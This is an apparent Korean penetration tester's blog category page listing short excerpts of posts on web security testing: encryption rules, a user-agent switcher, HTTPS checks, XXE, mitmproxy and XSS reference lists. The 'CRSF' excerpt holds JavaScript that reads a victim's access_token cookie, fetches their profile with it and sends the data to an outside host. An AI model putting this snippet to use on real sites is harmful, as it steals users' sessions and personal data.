본문 바로가기
728x90
반응형

웹/Hacking7

중요정보 송수신 암호화 관련 애플리케이션 검수를 진행하다보면 주민등록번호, 신용카드번호 등 중요정보 관련 문의사항이 오는 경우가 종종 있다. 막연하게 '중요정보는 암호화 하여 송수신 및 저장한다'라고 알고는 있지만, 어느 법규에 의거하는지 깊게 물어보면 즉답하기 꽤나 까다롭다. 하여, 비슷한 문의가 들어온 지금 정리하여 포스팅한다. 1. 개인정보의 기술적·관리적 보호조치 기준 https://www.law.go.kr/%ED%96%89%EC%A0%95%EA%B7%9C%EC%B9%99/(%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%EB%B3%B4%ED%98%B8%EC%9C%84%EC%9B%90%ED%9A%8C)%EA%B0%9C%EC%9D%B8%EC%A0%95%EB%B3%B4%EC%9D%98%EA%B8%B0%EC%88.. 2022. 11. 7.
User-Agent Switcher for Chrome 요즘 가장 많이 쓰는 브라우저는 아무래도 크롬이다. 일반 사용에도, 점검할 때도 많이 쓴다. 근데 가끔 모바일용 웹 사이트를 점검할 때 크롬 관리자 모드에서 '모바일 화면으로 보기(기기 툴바 전환)' 버튼을 눌러도 모바일 웹 화면으로 나오지 않는 경우가 종종 있다. 아마 해당 사이트에서 User-Aagent를 보기 때문인 것 같은데, 이럴 때 "User-Agent Switcher for Chrome"라는 크롬 확장 프로그램을 이용하면 모바일 웹 화면으로 해당 사이트를 볼 수 있다. https://chrome.google.com/webstore/detail/user-agent-switcher-for-c/djflhoibgkdhkhhcedjiklpkjnoahfmg User-Agent Switcher for C.. 2022. 11. 3.
취약한 HTTPS 점검 관련 정리 웹 애플리케이션을 점검하다보면, HTTPS 관련 점검 항목을 볼 수 있다. "취약한 HTTPS 프로토콜 이용", "취약한 HTTPS 암호 알고리즘 이용" 등인데, 해당 항목을 점검하는데 유용한 방법 세 가지는 아래와 같다. 1. ssllabs 점검하고자 하는 사이트와 점검자가 인터넷에만 연결되어 있다면 가장 편한 방법일 것이다. https://www.ssllabs.com/ Qualys SSL Labs Books Bulletproof SSL and TLS is a complete guide to deploying secure servers and web applications. This book, which provides comprehensive coverage of the ever-changing fi.. 2022. 9. 15.
"Scanner State 24 not Recognized" while trying XXE 출처1 : https://github.com/mozilla/rhino/issues/479 A potential XXE vulnerability found on rhino · Issue #479 · mozilla/rhino Howdy, Just found a potential XXE vulnerability on rhino as show below, it seems function toXml didn't add any protection from XXE vulnerability when parsing XML document. https://github.com/mo... github.com 출처2 : https://stackoverflow.com/questions/47169234/what-is-org-xml.. 2022. 4. 6.
CRSF 1. fetch 이용하기 var auth = document.cookie.match('(^|;) ?access_token=([^;]*)(;|$)')[2] fetch('/mobile-api/rest/api/v1/mobile/me/profile/',{ headers: { Authorization: 'Bearer ' + auth } }).then(a=>a.text()).then(a=>{location='http://jkns.kr/fsi.php?a='+(btoa(encodeURIComponent(a)))})2. XHR 이용하기 const xhr = new XMLHttpRequest(); xhr.open("GET", "http://jkns.kr/test.h.. 2022. 3. 10.
mitmproxy 가끔 패킷 관련 검수를 진행하다보면 MITM이 필요한 경우가 있다. 여러 패킷 에디터들이 많이 있지만 간단하게 구성할 수 있는 툴 중 mitmproxy 이 놈이 간편해서 정리함 1. 깃허브 github.com/mitmproxy/mitmproxy mitmproxy/mitmproxy An interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers. - mitmproxy/mitmproxy github.com 2. 공식 홈 mitmproxy.org/ mitmproxy - an interactive HTTPS proxy Mitmproxy powers a number of notable open-sour.. 2020. 10. 28.
웹 사이트 검수할 때 참고하면 좋은 사이트 https://html5sec.org/ HTML5 Security Cheatsheet html5sec.org https://gist.github.com/JohannesHoppe/5612274 666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L 666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L - 666_lines_of_XSS_vectors.html gist.github.com https://sqlwiki.netspi.com/#oracle NetSPI SQL Inj.. 2019. 7. 1.
728x90
반응형